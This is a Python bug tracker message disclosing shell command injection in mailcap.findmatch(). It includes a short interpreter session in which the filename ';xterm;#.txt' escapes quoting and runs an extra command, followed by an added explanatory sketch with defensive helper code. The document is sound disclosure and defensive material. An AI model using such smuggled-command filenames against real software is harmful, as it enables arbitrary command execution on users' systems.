[issue24778] mailcap.findmatch() ........ Shell Command Injection in filename
Bernd Dietzel
report at bugs.python.org
Mon Aug 3 22:31:07 CEST 2015
Bernd Dietzel added the comment:
Exploit demo which works with quote():
>>> commandline,MIMETYPE=mailcap.findmatch(d, 'text/*', filename=quote(';xterm;#.txt'))
>>> commandline
"less '';xterm;#.txt''"
>>> os.system(commandline)
### xterm starts
----------
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________
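Why `quote()` does not help in the session above, as an added example that is not part of the original message: the template already wraps `%s` in single quotes, so the quotes added by `quote()` close them and the `;` lands outside any quoting. The sketch models the substitution with a plain string replace instead of calling `mailcap` (an assumption), and `substitute`, `shell_tokens`, `has_command_separator` and `build_argv` are hypothetical helper names.

```python
import shlex
from shlex import quote

TEMPLATE = "less '%s'"      # view command as seen in the session above
FILENAME = ";xterm;#.txt"   # filename from the session above

def substitute(template, filename):
    """Text substitution of %s into a shell command string (modelled, not mailcap itself)."""
    return template.replace("%s", filename)

def shell_tokens(commandline):
    """Tokenize roughly as a POSIX shell would, keeping ; & | as operator tokens."""
    return list(shlex.shlex(commandline, posix=True, punctuation_chars=True))

def has_command_separator(commandline):
    """True if an unquoted shell operator survives in the final command line."""
    operators = set("();<>|&")
    return any(tok and set(tok) <= operators for tok in shell_tokens(commandline))

def build_argv(template, filename):
    """Split the template first, then substitute: the filename stays one argv item.
    The result is meant for subprocess.run(argv) without shell=True."""
    return [arg.replace("%s", filename) for arg in shlex.split(template)]

if __name__ == "__main__":
    # quote() inside an already-quoted %s: the quotes cancel out.
    unsafe = substitute(TEMPLATE, quote(FILENAME))
    print(unsafe, shell_tokens(unsafe), has_command_separator(unsafe))

    # quote() with an unquoted %s: the filename stays one word.
    quoted_once = substitute("less %s", quote(FILENAME))
    print(quoted_once, shell_tokens(quoted_once), has_command_separator(quoted_once))

    # No shell at all: the filename is a single argument whatever it contains.
    print(build_argv(TEMPLATE, FILENAME))
```

`build_argv` only covers templates that are a single command; entries that rely on pipes or redirection still need a shell and therefore a check such as `has_command_separator` on the final string, or rejection of filenames containing shell metacharacters.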